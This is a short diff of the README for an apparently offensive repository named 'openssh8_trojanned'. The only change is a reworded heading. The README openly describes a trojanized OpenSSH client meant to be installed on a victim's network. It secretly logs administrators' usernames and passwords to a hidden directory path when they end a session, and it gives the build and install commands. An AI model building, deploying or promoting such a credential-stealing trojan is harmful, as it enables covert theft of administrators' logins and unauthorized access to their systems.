bluedragonsecurity/openssh8_trojanned/README.md

 make
 sudo make install

-# WHAT FOR IS THIS ?
+# WHAT THE HELL IS THIS ?
 this trojanned version of openssh can be installed on a victim's subnet which has many ssh access.
 Everytime the administrator using the ssh client and finish his session using **exit** command, the ssh client will log his username and password at /opt/.../log.txt